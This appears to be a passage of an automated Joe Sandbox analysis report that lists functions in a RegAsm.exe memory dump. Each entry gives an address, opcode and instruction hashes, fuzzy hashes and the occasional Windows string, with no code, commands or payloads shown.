                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: MUI
                                • API String ID: 0-1339004836
                                • Opcode ID: 5c6b2aaefeab34f8e2157b83f0bf24ce5b58effd9a698ea8dc340fbf44bcc2b1
                                • Instruction ID: b293d80166324d8c7de02d5a6ed8d3f06c6f292e8b504ce1222b5c7b4b1e941a
                                • Opcode Fuzzy Hash: 5c6b2aaefeab34f8e2157b83f0bf24ce5b58effd9a698ea8dc340fbf44bcc2b1
                                • Instruction Fuzzy Hash: 3A824D75E002688FDB24CFA9C9847ADB7B5FF88314F15816AD85AAB350DB309E49CF50
                                Function 02C27370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: de4db7f84abd30356b5d4294f516cc213b51c7742a54d4200bf6962308613f4b
                                • Instruction ID: 3c45d48e95f88030450184b355f59867ff514cfe38eda5aaec2100354934ceab
                                • Opcode Fuzzy Hash: de4db7f84abd30356b5d4294f516cc213b51c7742a54d4200bf6962308613f4b
                                • Instruction Fuzzy Hash: 82A15C71A08341DFC721DF29D480A2AFBE6BF88704F15496DE58997350EB70EA49CF92
                                Function 02C5F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6d4110f7dedf7993266c7c1c7da26763ddfb54d1aee707297dce719eb9353adf
                                • Instruction ID: 3688cc1bdfdf7a9b335aa5a0fd9dbdfbceb968a696db12f5cb0a7147817f5b26
                                • Opcode Fuzzy Hash: 6d4110f7dedf7993266c7c1c7da26763ddfb54d1aee707297dce719eb9353adf
                                • Instruction Fuzzy Hash: 56416D74D01298EFDB24CFA9D480AAEBBF9FB49304F10456EE859A7711CB309941CF64
                                Function 02C5A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: GlobalTags
                                • API String ID: 0-1106856819
                                • Opcode ID: 815fad0952397786f215c22e1808ddfc2c884635cf7ab204a0a4367ebcd5050d
                                • Instruction ID: 485f633cc4c439ca3f0915fe2dcaa75a792f1d7c0e3a1b96c4017c7a6a025591
                                • Opcode Fuzzy Hash: 815fad0952397786f215c22e1808ddfc2c884635cf7ab204a0a4367ebcd5050d
                                • Instruction Fuzzy Hash: 3D717075E0021ADFDF28CF99D594AADB7B6BF88744F24812EE805A7380DB319941CF54
                                Function 02C2973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                • Instruction ID: c0d3987277af4aa05aca92af0c78a4f5c96d936e5562c3b7d3a3a06f7ed863bb
                                • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                • Instruction Fuzzy Hash: FC619F71D00269AFDF21DFA5C844BEEBBB5FF80718F284169E810B7250DB749A05DB61
                                Function 02CAF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                • Instruction ID: c498aa6f9f71ab6537fc65730d2286dc4737ebff1f03574363b6386d85e3baf2
                                • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                • Instruction Fuzzy Hash: 8051AD72504746AFD7229F24C894F6BB7E9FF84758F00092DBA8097690D7B5EE04CB92
                                Function 02C3E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: EXT-
                                • API String ID: 0-1948896318
                                • Opcode ID: 378d559ab40e021b8f41ec8ea368ecb0a23ed421fdaa69bfc33a69bd668bcc4b
                                • Instruction ID: 9328ddae7d71359ce98ef3b87fd5e1256a65066dad0c3cc7c0108c564b49dfdb
                                • Opcode Fuzzy Hash: 378d559ab40e021b8f41ec8ea368ecb0a23ed421fdaa69bfc33a69bd668bcc4b
                                • Instruction Fuzzy Hash: 1F41D2725083459BD722DA75C880B6BB7E9EFC8708F040D2DFA84E7140EB34DA08CB92
                                Function 02CDB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: PreferredUILanguages
                                • API String ID: 0-1884656846
                                • Opcode ID: 04bc134c71ff13dfc8c10fcb27a1410871ca3ccc7f1ded32856d3872c9647850
                                • Instruction ID: f76d1c6f16fa66c4db7c9a92abd0e4b7b3c55c3bcb15d90207c0cdf14233490e
                                • Opcode Fuzzy Hash: 04bc134c71ff13dfc8c10fcb27a1410871ca3ccc7f1ded32856d3872c9647850
                                • Instruction Fuzzy Hash: CC41D532D00219ABDF15DA95C840FFEB7B9EF84758F060166EA05A7250DB34DE40DBA0
                                Function 02C9C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: BinaryHash
                                • API String ID: 0-2202222882
                                • Opcode ID: 0b14dae1563a8105d021d9459a8f7769a5dd8badfc417cf46c6665b2204b856f
                                • Instruction ID: bc2c69b6fae961e675f1679eff698c01eac6e44a700d84ecbf7e272b6883bad3
                                • Opcode Fuzzy Hash: 0b14dae1563a8105d021d9459a8f7769a5dd8badfc417cf46c6665b2204b856f
                                • Instruction Fuzzy Hash: B04135B1D0056CAADF219B50CC88FDEB77DAF44718F0045D6AA08A7140DB709F899FA9
                                Function 02CA97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: verifier.dll
                                • API String ID: 0-3265496382
                                • Opcode ID: cbe108d2e8d407c9cc1b36ef807cb2bf12b3d29a86b076f38c4c0bc1262d2467
                                • Instruction ID: 7d7383f103e6d48c6030b2e317bb48304339b99f1288fe27239d3233a7f52e38
                                • Opcode Fuzzy Hash: cbe108d2e8d407c9cc1b36ef807cb2bf12b3d29a86b076f38c4c0bc1262d2467
                                • Instruction Fuzzy Hash: 9031A571B40202AFDB249F69A861B36B7E5EFC9718F948439E605DF381E7358D81C790
                                Function 02CC705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: kLsE
                                • API String ID: 0-3058123920
                                • Opcode ID: 3303b7309fe10bb60c1a266fd599a768e3764fbcec13276a65874062b00af525
                                • Instruction ID: 4245f5732e1b3ad591e79307f2c47a3be41030af0d4b6ef15d31d23cdde0780b
                                • Opcode Fuzzy Hash: 3303b7309fe10bb60c1a266fd599a768e3764fbcec13276a65874062b00af525
                                • Instruction Fuzzy Hash: 0341CB7198139067E720AB20EC447657B9CEB80B28F240A1CEC544B7C4CB708D9BDFD1
                                Function 02C536EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: Flst
                                • API String ID: 0-2374792617
                                • Opcode ID: 5a10f20d2c28954e46b6908a1091478a0622e272325c85503920287eb0fc3c56
                                • Instruction ID: 167f56ff02be1a8a3886f6007246d5f441b200374905a724ac8e03207e65793e
                                • Opcode Fuzzy Hash: 5a10f20d2c28954e46b6908a1091478a0622e272325c85503920287eb0fc3c56
                                • Instruction Fuzzy Hash: EC41D0B1605311DFC714CF29C184A16FBE4EF89794F1481AEE849CF241D731DA82CB96
                                Function 02C1C156 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: `
                                • API String ID: 0-4168407445
                                • Opcode ID: 796ee8064cf0c660c92cb37146b037cdc4fd8af5b88753759cd27eaf2debb0cd
                                • Instruction ID: 13d592a37b4a6c96d5fa9f96c8a441ed73ecf5d7a5f4561d31d746269c251fc7
                                • Opcode Fuzzy Hash: 796ee8064cf0c660c92cb37146b037cdc4fd8af5b88753759cd27eaf2debb0cd
                                • Instruction Fuzzy Hash: EF3139B25002109BCB21AF24CC41BB977B5EF80314F5485A9DC8A9B346DF74EE86DFA0
                                Function 02C25096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: Actx
                                • API String ID: 0-89312691
                                • Opcode ID: eb5ee5b9d316c979b06cb7b8e5ff622fabc697b7f892e2ab57fbbcfc04e6cb7d
                                • Instruction ID: 0f6822d718018124883b6b4b75f6a022df999f1ef64596d5729a2e926b939a02
                                • Opcode Fuzzy Hash: eb5ee5b9d316c979b06cb7b8e5ff622fabc697b7f892e2ab57fbbcfc04e6cb7d
                                • Instruction Fuzzy Hash: 411181313056328BEB2C491E8C507377295EBD53A8FB4812AE852CB390DF71D949C3C0
                                Function 02C7739A Relevance: .7, Instructions: 705COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1dfd9673a743e21ff3a1280f7cbb3b884bc05cd3e03ee0fb7d9af3b3a23111d6
                                • Instruction ID: 4d96908db87e6bd5c63f00131dfae7ccbfb9e3d873c946829b54b54644ffbf79
                                • Opcode Fuzzy Hash: 1dfd9673a743e21ff3a1280f7cbb3b884bc05cd3e03ee0fb7d9af3b3a23111d6
                                • Instruction Fuzzy Hash: 04429E71A0061A8FDB19CF59C890ABEF7B2FF88314B18856DD452AB350DB34E946CF90
                                Function 02C4B2C0 Relevance: .6, Instructions: 629COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c508fcc68219a6428ad69ada81d01f13dae419515f8c9059be9e89d3992480e4
                                • Instruction ID: 08e9c603658d4414bc79291109fd285aa3ad764bdd2954d9ad5e66841caeea7e
                                • Opcode Fuzzy Hash: c508fcc68219a6428ad69ada81d01f13dae419515f8c9059be9e89d3992480e4
                                • Instruction Fuzzy Hash: 5B32AF71E00219DBCB14DFA9D894BBEBBB5FF94718F184129E805AB381EB359D11CB90
                                Function 02CCA118 Relevance: .6, Instructions: 591COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b9c35bdfdb754d6e33858239c0c2404386b88fd8e8679209dc85501d55b32395
                                • Instruction ID: abe6f7b2afdc81718da9f91eb16c57d2639727109410a7f6d95569b578beda56
                                • Opcode Fuzzy Hash: b9c35bdfdb754d6e33858239c0c2404386b88fd8e8679209dc85501d55b32395
                                • Instruction Fuzzy Hash: 0A22E3746046698FDB24CF2AC058772B7F1BF84308F28859ED886CF685D735D692DB60
                                Function 02CE16CC Relevance: .6, Instructions: 571COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d4bb53ad206f6ee060c627b16cab2dc89088f703c481e02b7b36ba1ae2c45345
                                • Instruction ID: b6a3d283bf4fb30fc3d9f5adebf5472cf5d701310a2b6a80b61ce3815ee1f212
                                • Opcode Fuzzy Hash: d4bb53ad206f6ee060c627b16cab2dc89088f703c481e02b7b36ba1ae2c45345
                                • Instruction Fuzzy Hash: 40228E75A002168FCF19CF59C490ABEB7B2FF89318B18456DD85ADB344DB70AE52CB90
                                Function 02C18397 Relevance: .4, Instructions: 380COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ab2c98dc2012a80282a1727459e5e5c47ee3bc21463e2d1652943e70e983f3f9
                                • Instruction ID: fb62c7328b3d7afd8e05f0c8a092c969ab179884f00917369d23b055d67b126b
                                • Opcode Fuzzy Hash: ab2c98dc2012a80282a1727459e5e5c47ee3bc21463e2d1652943e70e983f3f9
                                • Instruction Fuzzy Hash: 7AD10671A046069BEB14DF25C892BBA73B6FF85318F044729F916DB280EB34DE45DB90
                                Function 02C2D7E0 Relevance: .3, Instructions: 342COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a04945a97e95f403ab42888f7af6a2b8d9946cf9d7e7630247b99144e7c62cca
                                • Instruction ID: 6f2f911059e1d50390f2feb801c9e5b99e3aa15c9a374467f044bc3de0621494
                                • Opcode Fuzzy Hash: a04945a97e95f403ab42888f7af6a2b8d9946cf9d7e7630247b99144e7c62cca
                                • Instruction Fuzzy Hash: A0C19371E002169BDB28DF59C840BAEB7B6EF94718F14C269D915BB380DB74EA45CBC0
                                Function 02C490DB Relevance: .3, Instructions: 287COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ab939db5dcb1c1ec417e7af79962bab08859259cc5b038c60b31a32ff5431a22
                                • Instruction ID: 0003a169ad016f1f2df74d20fd51dd7f7650182bf64816ba33d01566792a6af1
                                • Opcode Fuzzy Hash: ab939db5dcb1c1ec417e7af79962bab08859259cc5b038c60b31a32ff5431a22
                                • Instruction Fuzzy Hash: 02A19A71900615AFEB22EF64CC85FAF37BAAF85754F014054FA00AB2A0C779DD51DBA0
                                Function 02C283C0 Relevance: .3, Instructions: 281COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ec0cad5ca80d2b1747cd09cddcdcbe7268730f74ba9ae551f05d45f6fd086a89
                                • Instruction ID: c18ff5bbf30f488b9eead0932355cdf0f9ad855505d2ad5d3e4020f3daf209fc
                                • Opcode Fuzzy Hash: ec0cad5ca80d2b1747cd09cddcdcbe7268730f74ba9ae551f05d45f6fd086a89
                                • Instruction Fuzzy Hash: 4FC15C745083408FE764DF15C494BABB7E5FF88308F44896DE98987290DBB4EA09CF62
                                Function 02C60185 Relevance: .3, Instructions: 276COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d0746220ad4b182850ea071a17164d6e128f6c1fb5647b23e775b61474a4cfee
                                • Instruction ID: d42d6dfb03ee1f054d49d04e954814ba5a0f9ad6f95ac0952848ee957d221883
                                • Opcode Fuzzy Hash: d0746220ad4b182850ea071a17164d6e128f6c1fb5647b23e775b61474a4cfee
                                • Instruction Fuzzy Hash: F9A1C170B01616DBDB24CF65C9D8BBAB7B1FF84314F04402DEA45A7681EB34E912DB90
                                Function 02C3E3F0 Relevance: .3, Instructions: 261COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 453f372705229f1505282cb117efa890e155ce42aa45bbf3fb2f724f53d3db03
                                • Instruction ID: e80670e385211650f97aeac56d69dfc7e7004169be781f35d713a4e76913079b
                                • Opcode Fuzzy Hash: 453f372705229f1505282cb117efa890e155ce42aa45bbf3fb2f724f53d3db03
                                • Instruction Fuzzy Hash: 12915732A00615DBDB26EF59D444BBEB7A2EF88728F058865ED05DB380E734DE41CB91
                                Function 02C21131 Relevance: .3, Instructions: 259COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c2e3ee3dd0116637c244d80da088e8335378737677afdd0ae33b27616825e049
                                • Instruction ID: 65933df9e22ac78c1be8247ed813675d2d964085240b6e39b7b5282555854f42
                                • Opcode Fuzzy Hash: c2e3ee3dd0116637c244d80da088e8335378737677afdd0ae33b27616825e049
                                • Instruction Fuzzy Hash: 61B102756093808FD365CF29C580A6ABBE1BB88304F184A6EF899D7352D771E945CB42
                                Function 02C4D090 Relevance: .2, Instructions: 217COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                • Instruction ID: 65a4d183fb8b0fe3bcb1866b82d84d0eea795454f5c5e6e3c6e7be5988f282cd
                                • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                • Instruction Fuzzy Hash: EF816E72E001558BDF15EF68C9807AEB7B2FB88318F15C16AEC16B7344DB359A44CB91
                                Function 02C5E284 Relevance: .2, Instructions: 212COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bd7e6ee653dedebcbd9de7214d9c66a35beba31dda7e41020aad6ff6745225e7
                                • Instruction ID: 417a1f275a83070af95c352dc519371af93c7eb2465948ac6a186bfe9dbbfae2
                                • Opcode Fuzzy Hash: bd7e6ee653dedebcbd9de7214d9c66a35beba31dda7e41020aad6ff6745225e7
                                • Instruction Fuzzy Hash: 28818E71A00619EFDB25CFA5C880BEEB7BAFF88344F104429E959A7210D730EE45CB64
                                Function 02C3C640 Relevance: .2, Instructions: 206COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 11472f6f314399e996bb615fdd90353382ec6cc7585b58a376b173f845c2a42d
                                • Instruction ID: ad8596cd464db6475f70ce1cd3d9832ff975f27b40dcb211bfeb1937904c06cb
                                • Opcode Fuzzy Hash: 11472f6f314399e996bb615fdd90353382ec6cc7585b58a376b173f845c2a42d
                                • Instruction Fuzzy Hash: 9571E375D00269DBCB26DF59C4907BEBBB5FF89704F14861BE842AB750E7309A11CBA0
                                Function 02C3260B Relevance: .2, Instructions: 201COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 77fa4721ac17e59f6669f5d3bec4b13067d9720cca570bc3c9a46b6cc9e1fb01
                                • Instruction ID: b32ff35e843780670e114c7e01838a4cffbd11691bc651427ca411998d87b36d
                                • Opcode Fuzzy Hash: 77fa4721ac17e59f6669f5d3bec4b13067d9720cca570bc3c9a46b6cc9e1fb01
                                • Instruction Fuzzy Hash: 9071CE716046418FC712DF29C480B2AB7E6FF89714F0589AAEC99CB351DB34DD46CBA2
                                Function 02CB62A0 Relevance: .2, Instructions: 198COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7549b94cf2df94eaacd4e6ddd524bc9ec07fb2934d745805f02d377968bc0799
                                • Instruction ID: 17bde8aecd57d7b50ab542c51321b143001a196e5d34e989332ccd37e1fb3ecb
                                • Opcode Fuzzy Hash: 7549b94cf2df94eaacd4e6ddd524bc9ec07fb2934d745805f02d377968bc0799
                                • Instruction Fuzzy Hash: 30710432240B01AFD733CF14C884FAAB7EAEF84764F244928E65A976A0D775E944DF50
                                Function 02CA035C Relevance: .2, Instructions: 198COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                • Instruction ID: 40e62f79bdcd275d0834272a061c6effa836ea99d0ca23105e048e5c8117895a
                                • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                • Instruction Fuzzy Hash: E1719A71E00609AFCB11DFA9C994BAEBBBAFF88344F104569E505E7250DB34EA41DF90
                                Function 02CE132D Relevance: .2, Instructions: 188COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e660d0edb7bfcedd0a120f97d403814835df7d7e686055d950252937132078fd
                                • Instruction ID: f87f9dfcf3eb54627b4b6a5f8990e30b5b3c81e009aea9a489fa41be2e87140e
                                • Opcode Fuzzy Hash: e660d0edb7bfcedd0a120f97d403814835df7d7e686055d950252937132078fd
                                • Instruction Fuzzy Hash: 0D816D71A00245DFCB09CF99C480AAEB7F1FF88300F1981A9D85AEB345D774EA51CB90
                                Function 02CE903E Relevance: .2, Instructions: 186COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a717b7e1374e4ee1e90413b4b323fb8da0ee8cb0f662a393db7ecdfec50dc0b0
                                • Instruction ID: 4447a65b520a6e673d021ebd6739865e724bd298484a27c400603091e778e3c0
                                • Opcode Fuzzy Hash: a717b7e1374e4ee1e90413b4b323fb8da0ee8cb0f662a393db7ecdfec50dc0b0
                                • Instruction Fuzzy Hash: 7061E2B1600715AFDF15DF65C884BABBBA9FF88714F004619F86A87240DB34EA15CBD1
                                Function 02C27703 Relevance: .2, Instructions: 179COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
